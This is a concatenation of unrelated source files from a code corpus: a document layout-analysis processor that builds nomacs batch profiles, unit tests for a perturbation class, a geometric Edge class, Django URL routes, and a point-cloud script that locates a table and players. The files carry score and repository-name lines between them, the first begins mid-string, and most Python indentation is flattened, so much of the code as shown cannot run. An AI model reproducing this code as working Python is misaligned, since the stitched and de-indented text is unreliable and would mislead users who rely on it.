PluginBatch\pluginList=Layout Analysis | Detect Separator Lines
PluginBatch\LayoutPlugin\General\\useTextRegions=false
PluginBatch\LayoutPlugin\General\drawResults=false
PluginBatch\LayoutPlugin\General\saveXml=true
PluginBatch\LayoutPlugin\Super Pixel Labeler\\featureFilePath=
PluginBatch\LayoutPlugin\Super Pixel Labeler\labelConfigFilePath=
PluginBatch\LayoutPlugin\Super Pixel Labeler\maxNumFeaturesPerImage=1000000
PluginBatch\LayoutPlugin\Super Pixel Labeler\minNumFeaturesPerClass=10000
PluginBatch\LayoutPlugin\Super Pixel Labeler\maxNumFeaturesPerClass=10000
PluginBatch\LayoutPlugin\Super Pixel Classification\classifierPath=
"""
cCVLProfileTabReg ="""
[%%General]
FileList="%s"
OutputDirPath="%s"
FileNamePattern=<c:0>.<old>
SaveInfo\Compression=-1
SaveInfo\Mode=2
SaveInfo\DeleteOriginal=false
SaveInfo\InputDirIsOutputDir=true
PluginBatch\pluginList=Forms Analysis | Apply template (Match)
PluginBatch\FormAnalysis\FormFeatures\\formTemplate="%s"
PluginBatch\FormAnalysis\FormFeatures\distThreshold=200
PluginBatch\FormAnalysis\FormFeatures\colinearityThreshold=20
PluginBatch\FormAnalysis\FormFeatures\\variationThresholdLower=0.5
PluginBatch\FormAnalysis\FormFeatures\\variationThresholdUpper=0.55
PluginBatch\FormAnalysis\FormFeatures\saveChilds=false
"""
# cCVLProfileTabReg ="""
# [%%General]
# FileList="%s"
# OutputDirPath="%s"
# FileNamePattern=<c:0>.<old>
# SaveInfo\Compression=-1
# SaveInfo\Mode=2
# SaveInfo\DeleteOriginal=false
# SaveInfo\InputDirIsOutputDir=true
# PluginBatch\pluginList=Forms Analysis | Apply template (Match)
# PluginBatch\FormAnalysis\FormFeatures\\formTemplate="%s"
# PluginBatch\FormAnalysis\FormFeatures\distThreshold=200
# PluginBatch\FormAnalysis\FormFeatures\colinearityThreshold=20
# PluginBatch\FormAnalysis\FormFeatures\\variationThresholdLower=0.5
# PluginBatch\FormAnalysis\FormFeatures\\variationThresholdUpper=0.55
# PluginBatch\FormAnalysis\FormFeatures\saveChilds=false
# """
#--- INIT -------------------------------------------------------------------------------------------------------------
def __init__(self):
"""
Always call first the Component constructor.
"""
Component.Component.__init__(self, "tableProcessor", self.usage, self.version, self.description)
self.coldir = None
self.docid= None
self.bKeepRegion = False
self.bKeepTL=False
self.bTemplate = False
self.bBaseLine = False
self.bSeparator = False
self.bRegularTextLine = False
self.sTemplateFile = None
self.xmlns='http://schema.primaresearch.org/PAGE/gts/pagecontent/2013-07-15'
def setParams(self, dParams):
"""
Always call first the Component setParams
Here, we set our internal attribute according to a possibly specified value (otherwise it stays at its default value)
"""
Component.Component.setParams(self, dParams)
if "coldir" in dParams.keys():
self.coldir = dParams["coldir"].strip()
if "docid" in dParams.keys():
self.docid = dParams["docid"].strip()
# if dParams.has_key("bRegion"):
# self.bKeepRegion = dParams["bRegion"]
if "bTL" in dParams.keys():
self.bKeepTL = dParams["bTL"]
if "bBaseline" in dParams.keys():
self.bBaseLine = dParams["bBaseline"]
if "bSeparator" in dParams.keys():
self.bSeparator = dParams["bSeparator"]
if "template" in dParams.keys():
self.bTemplate = dParams["template"]
if "regTL" in dParams.keys():
self.bRegularTextLine = dParams["regTL"]
if "templatefile" in dParams.keys():
self.sTemplateFile = dParams["templatefile"]
self.bTemplate=True
def reintegrateTextIntoCells(self,doc,lLTextLines=[]):
"""
from XMLDSTABLE
"""
def overlapX(zone1,zone2):
[a1,a2] = zone1 #self.getX(),self.getX()+ self.getWidth()
[b1,b2] = zone2 #zone.getX(),zone.getX()+ zone.getWidth()
return min(a2, b2) >= max(a1, b1)
def overlapY(zone1,zone2):
[a1,a2] = zone1 #self.getY(),self.getY() + self.getHeight()
[b1,b2] = zone2 #zone.getY(),zone.getY() + zone.getHeight()
return min(a2, b2) >= max(a1, b1)
def signedRatioOverlap(zone1,zone2):
"""
overlap self and zone
return surface of self in zone
"""
[x1,y1,x12,y12] = zone1 #self.getX(),self.getY(),self.getHeight(),self.getWidth()
[x2,y2,x22,y22] = zone2 #zone.getX(),zone.getY(),zone.getHeight(),zone.getWidth()
w1,h1 = x12-x1,y12-y1
w2,h2 = x22-x2,y22-y2
fOverlap = 0.0
# print (x1,x12),(x2,x22)
# print overlapX((x1,x12),(x2,x22))
# print (y1,y12),(y2,y22)
# print overlapY((y1,y12),(y2,y22))
# if overlapX((x1,w1),(x2,w2)) and overlapY((y1,h1),(y2,h2)):
if overlapX((x1,x12),(x2,x22)) and overlapY((y1,y12),(y2,y22)):
[x11,y11,x12,y12] = [x1,y1,x1+w1,y1+h1]
[x21,y21,x22,y22] = [x2,y2,x2+w2,y2+h2]
s1 = w1 * h1
# possible ?
if s1 == 0: s1 = 1.0
#intersection
nx1 = max(x11,x21)
nx2 = min(x12,x22)
ny1 = max(y11,y21)
ny2 = min(y12,y22)
h = abs(nx2 - nx1)
w = abs(ny2 - ny1)
inter = h * w
if inter > 0 :
fOverlap = inter/s1
else:
# if overX and Y this is not possible !
fOverlap = 0.0
return fOverlap
def bestRegionsAssignment(plgtl,lRegions):
"""
find the best (max overlap for self) region for self
"""
lOverlap=[]
for _,plg in lRegions:
lOverlap.append(signedRatioOverlap(plgtl.getBoundingBox(),plg.getBoundingBox()))
# print plgtl.getBoundingBox(), lOverlap
if max(lOverlap) == 0: return None
return lRegions[lOverlap.index(max(lOverlap))]
lPages = PageXml.getChildByName(doc.getroot(),'Page')
lRegionsToBeDeleted = []
for i, page in enumerate(lPages):
if lLTextLines == []:
lTextLines = PageXml.getChildByName(page,'TextLine')
else: lTextLines =lLTextLines[i]
lCells = PageXml.getChildByName(page,'TableCell')
# print len(lCells),len(lTextLines)
lOCells=[]
for cell in lCells:
#get Coords
xpath = "./a:%s" % ("Coords")
lCoords = cell.xpath(xpath,namespaces={"a": self.xmlns})
coord= lCoords[0]
sPoints=coord.get('points')
lsPair = sPoints.split(' ')
lXY = list()
for sPair in lsPair:
(sx,sy) = sPair.split(',')
lXY.append( (int(sx), int(sy)) )
plg = Polygon(lXY)
lOCells.append((cell,plg))
# find the best assignment of each text
for tl in lTextLines:
#get Coords
xpath = "./a:%s" % ("Coords")
lCoords = tl.xpath(xpath,namespaces={"a": self.xmlns})
coord= lCoords[0]
sPoints=coord.get('points')
lsPair = sPoints.split(' ')
lXY = list()
for sPair in lsPair:
(sx,sy) = sPair.split(',')
lXY.append( (int(sx), int(sy)) )
plg = Polygon(lXY)
cell = bestRegionsAssignment(plg,lOCells)
if cell:
c,_=cell
                lRegionsToBeDeleted.append(c.getparent())
## what about parent TextRegion delete at least TextRegion/TextEquiv
# tl.unlinkNode()
                tlcp = deepcopy(tl)
# tlcp.unlinkNode()
c.append(tlcp)
# print c
for region in lRegionsToBeDeleted:
            region.getparent().remove(region)
# region.unlinkNode()
# region.freeNode()
def reinitPage(self,doc):
"""
empty page
"""
lNodes = PageXml.getChildByName(doc.getroot(),'Page')
for node in lNodes:
            node.getparent().remove(node)
def findTemplate(self,doc):
"""
find the page where the first TableRegion occurs and extract it
"""
from copy import deepcopy
lT = PageXml.getChildByName(doc.getroot(),'TableRegion')
if lT == []:
return None
firstTable=lT[0]
# lazy guy!
newDoc,fakepage = PageXml.createPageXmlDocument('NLE', '', 0,0)
page=firstTable.getparent()
fakepage.set("imageFilename",page.get('imageFilename'))
fakepage.set("imageWidth",page.get('imageWidth'))
fakepage.set("imageHeight",page.get('imageHeight'))
page.getparent().remove(page)
# add table
xx =deepcopy(firstTable)
fakepage.append(xx)
return newDoc
def createRegistrationProfile(self,sTemplatefile):
# get all images files
localpath = os.path.abspath("./%s/col/%s"%(self.coldir,self.docid))
l = glob.glob(os.path.join(localpath, "*.jpg"))
l.sort()
listfile = ";".join(l)
listfile = listfile.replace(os.sep,"/")
txt= LAProcessor.cCVLProfileTabReg % (listfile,localpath.replace(os.sep,"/"),os.path.abspath("%s"%(sTemplatefile)).replace(os.sep,"/"))
# wb mandatory for crlf in windows
prnfilename = "%s%s%s_reg.prn"%(self.coldir,os.sep,self.docid)
f=open(prnfilename,'w', encoding="utf-8")
f.write(txt)
return prnfilename
def createLinesProfile(self):
"""
OutputDirPath mandatory
"""
# get all images files
localpath = os.path.abspath("./%s/col/%s"%(self.coldir,self.docid))
l = glob.glob(os.path.join(localpath, "*.jpg"))
l.sort()
listfile = ";".join(l)
listfile = listfile.replace(os.sep,"/")
localpath = localpath.replace(os.sep,'/')
txt = LAProcessor.cCVLLASeparatorProfile % (listfile,localpath)
# wb mandatory for crlf in windows
prnfilename = "%s%s%s_gl.prn"%(self.coldir,os.sep,self.docid)
f=open(prnfilename,'wb')
        f.write(txt.encode('utf-8'))
return prnfilename
def createLAProfile(self):
"""
OutputDirPath mandatory
"""
# get all images files
localpath = os.path.abspath("./%s/col/%s"%(self.coldir,self.docid))
l = glob.glob(os.path.join(localpath, "*.jpg"))
l.sort()
listfile = ";".join(l)
listfile = listfile.replace(os.sep,"/")
localpath = localpath.replace(os.sep,'/')
txt = LAProcessor.cCVLLAProfile % (listfile,localpath,self.bKeepRegion)
# print txt
# wb mandatory for crlf in windows
prnfilename = "%s%s%s_la.prn"%(self.coldir,os.sep,self.docid)
f=open(prnfilename,'wb')
        f.write(txt.encode('utf-8'))
return prnfilename
def storeMPXML(self,lFiles):
"""
store files in lFiles as mpxml
"""
docDir = os.path.join(self.coldir+os.sep+'col',self.docid)
doc = MultiPageXml.makeMultiPageXml(lFiles)
sMPXML = docDir+".mpxml"
# print sMPXML
doc.write(sMPXML,encoding="UTF-8",pretty_print=True,xml_declaration=True)
# trace("\t\t- validating the MultiPageXml ...")
# if not MultiPageXml.validate(doc):
# traceln(" *** WARNING: XML file is invalid against the schema: '%s'"%self.outputFileName)
# traceln(" Ok!")
return doc, sMPXML
def extractFileNamesFromMPXML(self,doc):
"""
to insure correct file order !
"""
xmlpath=os.path.abspath("%s%s%s%s%s" % (self.coldir,os.sep,'col',os.sep,self.docid))
lNd = PageXml.getChildByName(doc.getroot(), 'Page')
# for i in lNd:print i
return list(map(lambda x:"%s%s%s.xml"%(xmlpath,os.sep,x.get('imageFilename')[:-4]), lNd))
def performLA(self,doc):
"""
# for document doc
## find the page where the template is
## store it as template (check borders))
## generate profile for table registration
## (execution)
## create profile for lA
## (execution)
"""
# lNumPages = []
if self.bTemplate or self.bBaseLine or self.bSeparator:
# extract list of files sorted as in MPXML
lFullPathXMLNames = self.extractFileNamesFromMPXML(doc)
nbPages = len(lFullPathXMLNames)
## 1 generate xml files if only pxml are there
xmlpath=os.path.abspath(os.path.join (self.coldir,'col',self.docid))
lXMLNames = [ "%s%s%s"%(xmlpath,os.sep,name) for name in os.listdir(xmlpath) if os.path.basename(name)[-4:] =='.xml']
isXml = [] != lXMLNames
if isXml:
[ os.remove("%s%s%s"%(xmlpath,os.sep,name)) for name in os.listdir(xmlpath) if os.path.basename(name)[-4:] =='.xml']
isXml = False
isPXml = [] != [ name for name in os.listdir(xmlpath) if os.path.basename(name)[-5:] =='.pxml']
assert not isXml and isPXml
# recreate doc? (mpxml)
lPXMLNames = [ name for name in os.listdir(xmlpath) if os.path.basename(name)[-5:] =='.pxml']
if not isXml:
# copy pxml in xml
for name in lPXMLNames:
oldname = "%s%s%s" %(xmlpath,os.sep,name)
newname = "%s%s%s" % (xmlpath,os.sep,name)
newname = newname[:-5]+'.xml'
tmpdoc = etree.parse(oldname)
tmpdoc.write(newname,encoding="UTF-8", pretty_print=True,xml_declaration=True)
if self.bKeepTL:
            # keep the existing TextLine elements
lTextLines=[]
lPages = PageXml.getChildByName(doc.getroot(),'Page')
for page in lPages:
lTextLines.append(PageXml.getChildByName(page,'TextLine'))
## Table registration
if self.bTemplate:
if self.sTemplateFile is None:
templatePage = self.findTemplate(doc)
if templatePage is None:
traceln("No table found in this document: %s" % self.docid)
else:
oldOut= self.outputFileName
self.outputFileName = "%s%s%s.templ.xml" % (self.coldir,os.sep,self.docid)
stemplatefile = "%s%s%s.templ.xml" % (self.coldir,os.sep,self.docid)
print (stemplatefile)
self.writeDom(templatePage, True)
self.outputFileName = oldOut
prnregfilename= self.createRegistrationProfile(stemplatefile)
else:
# raise Exception, 'file template stuff: to be done'
prnregfilename= self.createRegistrationProfile(self.sTemplateFile)
job = LAProcessor.cNomacs+ " --batch %s"%(prnregfilename)
os.system(job)
traceln('table registration done: %s'% prnregfilename)
## separator detection
if self.bSeparator:
prnglfilename = self.createLinesProfile()
job = LAProcessor.cNomacs+ " --batch %s"%(prnglfilename)
os.system(job)
traceln( 'GL done: %s' % prnglfilename)
## baseline detection
if self.bBaseLine:
prnlafilename = self.createLAProfile()
# job = LAProcessor.cNomacs+ " --batch %s"%(prnlafilename)
            job = LAProcessor.cNomacs + " --batch %s" % (prnlafilename)
os.system(job)
traceln('LA done: %s' % prnlafilename)
if self.bTemplate or self.bBaseLine or self.bSeparator:
doc, sMPXML= self.storeMPXML(lFullPathXMLNames)
# Does not work with URO LA!
if self.bKeepTL:
self.reintegrateTextIntoCells(doc,lTextLines)
## text rectangles as textline region
if self.bRegularTextLine:
self.regularTextLines(doc)
doc.write(sMPXML,encoding="UTF-8",pretty_print=True,xml_declaration=True)
return doc, nbPages
def regularTextLinesold(self,doc):
"""
from a baseline: create a regular TextLine:
also: for slanted baseline:
"""
from shapely.geometry import LineString
from shapely.affinity import translate
self.xmlns='http://schema.primaresearch.org/PAGE/gts/pagecontent/2013-07-15'
lTextLines = PageXml.getChildByName(doc.getroot(),'TextLine')
for tl in lTextLines:
#get Coords
xpath = "./a:%s" % ("Coords")
lCoords = tl.xpath(xpath,namespaces={"a": self.xmlns})
coord= lCoords[0]
xpath = "./a:%s" % ("Baseline")
lBL = tl.xpath(xpath,namespaces={"a": self.xmlns})
baseline = lBL[0]
sPoints=baseline.get('points')
lsPair = sPoints.split(' ')
lXY = list()
for sPair in lsPair:
try:
(sx,sy) = sPair.split(',')
lXY.append( (int(sx), int(sy)) )
except ValueError:print (tl)
plg = Polygon(lXY)
line=LineString(lXY)
            # 50 seems too large: the manual GT is 30? not always!
iHeight = 30 # in pixel
x1,y1, x2,y2 = plg.getBoundingBox()
if coord is not None:
coord.set('points',"%d,%d %d,%d %d,%d %d,%d" % (x1,y1-iHeight,x2,y1-iHeight,x2,y2,x1,y2))
else:
print (tl)
def regularTextLines(self,doc):
"""
from a baseline: create a regular TextLine:
"""
from shapely.geometry import LineString
from shapely.affinity import translate
self.xmlns='http://schema.primaresearch.org/PAGE/gts/pagecontent/2013-07-15'
lTextLines = PageXml.getChildByName(doc.getroot(),'TextLine')
for tl in lTextLines:
#get Coords
xpath = "./a:%s" % ("Coords")
lCoords = tl.xpath(xpath,namespaces={"a": self.xmlns})
coord= lCoords[0]
xpath = "./a:%s" % ("Baseline")
lBL = tl.xpath(xpath,namespaces={"a": self.xmlns})
try:baseline = lBL[0]
except IndexError:continue
sPoints=baseline.get('points')
lsPair = sPoints.split(' ')
lXY = list()
for sPair in lsPair:
try:
(sx,sy) = sPair.split(',')
lXY.append( (int(sx), int(sy)) )
except ValueError:print (tl)
#plg = Polygon(lXY)
try: line=LineString(lXY)
except ValueError: continue # LineStrings must have at least 2 coordinate tuples
topline=translate(line,yoff=-20)
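            # The closed TextLine polygon below follows the baseline left-to-right and
            # then the 20 px upward-shifted top line right-to-left (y grows downwards
            # in image coordinates, hence yoff=-20).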
#iHeight = 20 # in pixel
#x1,y1, x2,y2 = topline.getBoundingBox()
if coord is not None:
spoints = ' '.join("%s,%s"%(int(x[0]),int(x[1])) for x in line.coords)
lp=list(topline.coords)
lp.reverse()
spoints =spoints+ ' ' +' '.join("%s,%s"%(int(x[0]),int(x[1])) for x in lp)
#spoints = ' '.join("%s,%s"%(x[0],x[1]) for x in pp.coords)
#coord.set('points',"%d,%d %d,%d %d,%d %d,%d" % (x1,y1-iHeight,x2,y1-iHeight,x2,y2,x1,y2))
coord.set('points',spoints)
else:
print (tl)
# print tl
def run(self,doc):
"""
GT from TextRegion
or GT from Table
input mpxml (GT)
delete TextLine
"""
if not (self.bTemplate or self.bBaseLine or self.bSeparator) and self.bRegularTextLine:
self.regularTextLines(doc)
self.writeDom(doc, True)
else:
doc,nbpages = self.performLA(doc)
return doc
if __name__ == "__main__":
# for each document
## find the page where the template is
## store it as template (check borders))
## generate profile for table registration
## (execution)
## create profile for lA
## (execution)
tp = LAProcessor()
#prepare for the parsing of the command line
tp.createCommandLineParser()
tp.add_option("--coldir", dest="coldir", action="store", type="string", help="collection folder")
tp.add_option("--docid", dest="docid", action="store", type="string", help="document id")
tp.add_option("--bl", dest="bBaseline", action="store_true", default=False, help="detect baselines")
# tp.add_option("--region", dest="bRegion", action="store_true", default=False, help="keep Region")
tp.add_option("--tl", dest="bTL", action="store_true", default=False, help="keep textlines")
tp.add_option("--sep", dest="bSeparator", action="store_true", default=False, help="detect separator (graphical lines)")
tp.add_option("--regTL", dest="regTL", action="store_true", default=False, help="generate regular TextLines")
tp.add_option("--form", dest="template", action="store_true", default=False, help="perform template registration")
tp.add_option("--formfile", dest="templatefile", action="store", type='string', default=None,help="use this template file (pagexml) for registration")
#tp.add_option("--form", dest="template", action="store", type="string", help="perform template registration")
#parse the command line
dParams, args = tp.parseCommandLine()
#Now we are back to the normal programmatic mode, we set the componenet parameters
tp.setParams(dParams)
doc = tp.loadDom()
tp.run(doc)
| 1.625 | 2 |
tests/pert_test.py | EnricaBelfiore/sandy | 30 | 12786779 | import pytest
from io import StringIO
import numpy as np
import pandas as pd
import sandy
__author__ = "<NAME>"
#####################
# Test initialization
#####################
def test_from_file_1_column():
vals = '1\n5\n9'
file = StringIO(vals)
with pytest.raises(Exception):
sandy.Pert.from_file(file)
def test_from_file_non_monotonic():
vals = '1 1\n6 5\n5 2\n9 3'
file = StringIO(vals)
with pytest.raises(Exception):
sandy.Pert.from_file(file)
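# The pert3 fixture below builds a Pert from a three-column block: judging from the
# assertions further down, the first column becomes the (right) energy bounds and the
# second the perturbation values, i.e. a Series over (0, 1], (1, 5], (5, 9] with values
# [1., 2., 3.]; the extra third column is only expected to trigger a warning.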
@pytest.fixture(scope="module")
def pert3():
vals = '1 1 5\n5 2 1\n9 3 1'
file = StringIO(vals)
return sandy.Pert.from_file(file)
def test_from_file_3_columns(pert3):
# should try and catch the warning
pass
def test_init_with_series(pert3):
pert = sandy.Pert(pert3.right)
assert pert.data.equals(pert3.data)
def test_init_with_dataframe(pert3):
with pytest.raises(Exception):
sandy.Pert(pert3.right.to_frame())
def test_init_with_intervalindex(pert3):
pert = sandy.Pert(pert3.data)
assert pert.data.equals(pert3.data)
################################
# Test initialization attributes
################################
def test_Pert_type(pert3):
assert isinstance(pert3, sandy.Pert)
def test_Pert_data_index_type(pert3):
assert isinstance(pert3.data.index, pd.IntervalIndex)
def test_Pert_data_index_right_values(pert3):
assert pert3.data.index.right.tolist() == [1, 5, 9]
def test_Pert_data_index_left_values(pert3):
assert pert3.data.index.left.tolist() == [0, 1, 5]
def test_Pert_data_index_float(pert3):
assert pert3.data.index.right.values.dtype == float
def test_Pert_data_values(pert3):
np.testing.assert_array_equal(pert3.data.values, [1,2,3])
def test_Pert_data_values_float(pert3):
assert pert3.data.values.dtype == float
########################
# Test attributes
########################
########################
# Test methods
########################
# def test_Spectrum_selfreshape(spec_const):
# S = spec_const.reshape(spec_const.right.index)
# assert np.allclose(S.data.values,spec_const.data.values)
# @pytest.mark.parametrize("eg, flux",
# [
# ([30], 500),
# ([6e-12], 0.6),
# ([5e-12], 0.5),
# ([4e-12], 0.4),
# ([1e-11], 1),
# ([18.896380829766173], 499),
# ([1e-10, 1e-9, 1e-8, 1e-7, 1e-6, 1e-5, 1e-4, 1e-3, 1e-2, 1e-1, 1e0, 1e1, 20], 500),
# ]
# )
# def test_Spectrum_reshape(spec_const, eg, flux):
# S = spec_const.reshape(eg)
# assert S.right.index.tolist() == eg
# assert S.flux == pytest.approx(flux)
# @pytest.mark.parametrize("eg, err, errtype",
# [
# ([2, 1], True, ValueError),
# ([2, 2], False, None),
# ([-1, 2], True, ValueError),
# ]
# )
# def test_Spectrum_reshape_error(spec_const, eg, err, errtype):
# if err:
# with pytest.raises(errtype):
# spec_const.reshape(eg)
# else:
# spec_const.reshape(eg) | 2.140625 | 2 |
sect/core/trapezoidal/edge.py | lycantropos/sect | 17 | 12786780 | from ground.base import (Context,
Orientation)
from ground.hints import Point
from reprit.base import generate_repr
class Edge:
@classmethod
def from_endpoints(cls,
left: Point,
right: Point,
interior_to_left: bool,
context: Context) -> 'Edge':
"""Constructs edge given its endpoints."""
return cls(left, right, interior_to_left, context)
__slots__ = 'context', 'interior_to_left', 'left', 'right'
def __init__(self,
left: Point,
right: Point,
interior_to_left: bool,
context: Context) -> None:
assert left < right, 'Incorrect endpoints order'
self.context, self.interior_to_left, self.left, self.right = (
context, interior_to_left, left, right)
def __lt__(self, other: 'Edge') -> bool:
"""Checks if the edge is lower than the other."""
other_left_orientation = self.orientation_of(other.left)
other_right_orientation = self.orientation_of(other.right)
if other_left_orientation is other_right_orientation:
return other_left_orientation is Orientation.COUNTERCLOCKWISE
elif other_left_orientation is Orientation.COLLINEAR:
return other_right_orientation is Orientation.COUNTERCLOCKWISE
left_orientation = other.orientation_of(self.left)
right_orientation = other.orientation_of(self.right)
if left_orientation is right_orientation:
return left_orientation is Orientation.CLOCKWISE
elif left_orientation is Orientation.COLLINEAR:
return right_orientation is Orientation.CLOCKWISE
elif other_right_orientation is Orientation.COLLINEAR:
return other_left_orientation is Orientation.COUNTERCLOCKWISE
else:
return (left_orientation is Orientation.CLOCKWISE
if right_orientation is Orientation.COLLINEAR
# crossing edges are incomparable
else NotImplemented)
__repr__ = generate_repr(__init__)
def orientation_of(self, point: Point) -> Orientation:
"""Returns orientation of the point relative to the edge."""
return self.context.angle_orientation(self.left, self.right, point)
| 3.234375 | 3 |
asset_app/urls.py | jameskomo/asset-management-system | 3 | 12786781 | <gh_stars>1-10
from django.urls import path
from django.conf.urls import url
from .views import (
AssetsListView,
AssetsDetailView,
AssetsCreateView,
AssetsUpdateView,
AssetsDeleteView,
)
from . import views
urlpatterns = [
path('', AssetsListView.as_view(), name='assets_app_home'),
path('assets/<int:pk>/', AssetsDetailView.as_view(), name='assets-detail'),
path('assets/new/', AssetsCreateView.as_view(), name='assets-create'),
path('assets/<int:pk>/update/', AssetsUpdateView.as_view(), name='assets-update'),
path('assets/<int:pk>/delete/', AssetsDeleteView.as_view(), name='assets-delete'),
path('about/', views.about, name='asset_app-about'),
url(r'^searchassets/$', views.assetssearch, name='assetssearch'),
]
| 1.851563 | 2 |
src/areas_determination.py | joeyzhong90595/Robotic_Poker_Dealer | 2 | 12786782 | <filename>src/areas_determination.py<gh_stars>1-10
#!/usr/bin/env python
import numpy as np
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import pcl
from sensor_msgs.msg import PointCloud
# Extra points from point cloud according to indices
def extra_pc(pc, indices):
coord = []
for index in indices:
coord.append(list(pc[index]))
array = np.array(coord, dtype='float32')
pc = pcl.PointCloud(array)
return pc
# Pass through pc filter
def pass_through(pc, field="z", range=[0,3]):
pass_fil = pc.make_passthrough_filter()
pass_fil.set_filter_field_name(field)
pass_fil.set_filter_limits(range[0], range[1])
return pass_fil.filter()
# Down sampling point clouds
def down_sampling(pc, leaf_size=[0.03, 0.03, 0.03]):
sor = pc.make_voxel_grid_filter()
sor.set_leaf_size(leaf_size[0], leaf_size[1], leaf_size[2])
return sor.filter()
# Point cloud plane detection
def plane_detection(pc, k=50, optimize=True, model=pcl.SACMODEL_NORMAL_PLANE,
method=pcl.SAC_RANSAC, dis_threshold=0.01, normal_weight=0.01, iteration=100):
seg = pc.make_segmenter_normals(ksearch=k)
seg.set_optimize_coefficients(optimize)
seg.set_model_type(model)
seg.set_method_type(method)
seg.set_distance_threshold(dis_threshold)
seg.set_normal_distance_weight(normal_weight)
seg.set_max_iterations(iteration)
indices, coefficients = seg.segment()
if len(indices) == 0:
print('Could not estimate a planar model for the given dataset.')
exit(0)
return indices, coefficients
# Outlier filter
def outlier_fil(pc, mean=50, sdv=1):
outlier_fil = pc.make_statistical_outlier_filter()
outlier_fil.set_mean_k(mean)
outlier_fil.set_std_dev_mul_thresh(sdv)
return outlier_fil.filter()
# Get homogeneous matrix from point o, x, y
def get_homogeneous(o, x, y):
# Origin coordinate
x0 = np.array([1, 0, 0])
y0 = np.array([0, 1, 0])
z0 = np.array([0, 0, 1])
# New coordinate
x1 = (x-o) / np.linalg.norm(x-o)
y1 = (y-o) / np.linalg.norm(y-o)
z1 = np.cross(x1,y1)
# Transform homogeneous matrix
homo = np.array([[np.dot(x1,x0), np.dot(y1,x0), np.dot(z1,x0), o[0]],
[np.dot(x1,y0), np.dot(y1,y0), np.dot(z1,y0), o[1]],
[np.dot(x1,z0), np.dot(y1,z0), np.dot(z1,z0), o[2]],
[0, 0, 0, 1]])
return homo
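# Quick sanity check (synthetic points, not from recorded data): with
#   o = np.array([0., 0., 0.]), x = np.array([1., 0., 0.]), y = np.array([0., 1., 0.])
# the new axes coincide with the camera axes and get_homogeneous(o, x, y) returns the
# 4x4 identity; a non-zero o only changes the last column (the translation part).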
# Main
def det_areas(rgb_image, pc2, loc):
'''
Return player side information and displacement in table coordinate
    :param rgb_image: RGB Kinect image
:param pc2: point cloud
:param loc: players' location in image
:return: A list consisting of player's side and player's displacement
in table coordinate of each player
'''
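    # Note: each entry of loc is treated as (top, right, bottom, left) pixel bounds,
    # since the loops below scan rows player_loc[0]..player_loc[2] and columns
    # player_loc[3]..player_loc[1]; this matches the bounding boxes produced by the
    # face-recognition step (an assumption inferred from that usage).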
# Find The Table
# Pass through the far away points
passed_pc = pass_through(pc2)
# Down sampling to simplify calculation
sored_pc = down_sampling(passed_pc)
# Find plane
indices, coefficients = plane_detection(sored_pc)
# Extra plane
plane_pc = extra_pc(sored_pc, indices)
# Filte outlier
table_pc = outlier_fil(plane_pc)
# Determine Table Coordinate
# Sort the points
array_table = table_pc.to_array()
z_array = array_table[array_table[:,2].argsort()] # sort according to z
x_array = array_table[array_table[:,0].argsort()] # sort according to x
# Use some samples to determine corners
num_sample = 3
top_corner = np.zeros(3)
left_corner = np.zeros(3)
right_corner = np.zeros(3)
for i in range(num_sample):
top_corner += z_array[-(i+1)]
left_corner += x_array[i]
right_corner += x_array[-(i+1)]
top_corner /= num_sample
left_corner /= num_sample
right_corner /= num_sample
# Calculate homogeneous matrix
homo_matrix = get_homogeneous(top_corner, left_corner, right_corner)
'''
# For debugging
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(array_table[:,0], array_table[:,1], array_table[:,2], zdir='z', c='black')
ax.scatter(top_corner[0], top_corner[1], top_corner[2], zdir='z', c='red')
ax.scatter(left_corner[0], left_corner[1], left_corner[2], zdir='z', c='red')
ax.scatter(right_corner[0], right_corner[1], right_corner[2], zdir='z', c='red')
'''
# Determine Player Location in Table Coordinate
players_info = []
# load each player
for player_loc in loc:
# Player Info Container
# First element decides where the player is
# Second element decides the displacement between the player and the origin
info = []
# See whether the player is sitting on the left or right
if player_loc[3] < 470:
info.append(2) # 2 represents left
else:
info.append(1) # 1 represents right
# Get Facial Points in world coordinates
face_index = []
# Calculate face coordinate
for y in range(player_loc[0], player_loc[2]+1):
for x in range(player_loc[3], player_loc[1]+1):
face_index.append(y*len(rgb_image[0]) + x)
# Extra face points
pc_face = extra_pc(pc2, face_index)
# Pass through the far away points
passed_face = pass_through(pc_face)
# Down sampling to simplify calculation
sored_face = down_sampling(passed_face)
# Perform a outlier filter
filtered_face = outlier_fil(sored_face)
# Calculate player location
face_loc = filtered_face
# Calculate Displacement in New Coordinate
# Take the average coord as player location
array_face = face_loc.to_array()
face_camera_coord = np.average(array_face, axis=0)
# Transform from camera coordinate to table coordinate
face_table_coord = np.dot(np.linalg.inv(homo_matrix), np.append(face_camera_coord, 1))
# The displacement information
if info[0] == 1:
displacement = face_table_coord[1]
else:
displacement = face_table_coord[0]
info.append(int(displacement*1000))
# Save result
players_info.append(info)
'''
# For debugging
ax.scatter(face_camera_coord[0], face_camera_coord[1], face_camera_coord[2], zdir='z', c= 'yellow')
ax.scatter(array_face[:,0], array_face[:,1], array_face[:,2], zdir='z', c= 'orange')
plt.show() # For debugging '''
players_arr = np.array(players_info)
index = np.lexsort((players_arr[:,1], players_arr[:,0]))
players_info = players_arr[index].tolist()
return players_info
if __name__ == "__main__":
from player_recognition import face_rec
import os
# load image
rbg_image_path = os.path.join(os.path.dirname(__file__),"../data/test_rgb.jpg")
rbg_image = mpimg.imread(rbg_image_path)
pcl_path = os.path.join(os.path.dirname(__file__),"../data/test.pcd")
pc2 = pcl.load(pcl_path)
# detect areas
loc = face_rec(rbg_image)
infos = det_areas(rbg_image, pc2, loc)
# show result
for info in infos:
print ["Player side:", info[0], "Player displacement:", info[1]]
| 2.328125 | 2 |
18f/prac2/aah.py | willzhang05/icpc-practice | 0 | 12786783 | <filename>18f/prac2/aah.py
a = input()
b = input()
print("go" if len(b) <= len(a) else "no")
| 3.21875 | 3 |
nodenet/python/nodenet/trainingsessions/__init__.py | NOOXY-research/NodeNet | 2 | 12786784 | <gh_stars>1-10
# Create alias
from nodenet.trainingsessions.batch import *
from nodenet.trainingsessions.online import *
| 0.957031 | 1 |
broker/plugins/spark_sahara/plugin.py | alessandroliafook/bigsea-manager | 3 | 12786785 | <reponame>alessandroliafook/bigsea-manager<filename>broker/plugins/spark_sahara/plugin.py
# Copyright (c) 2017 UFCG-LSD.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
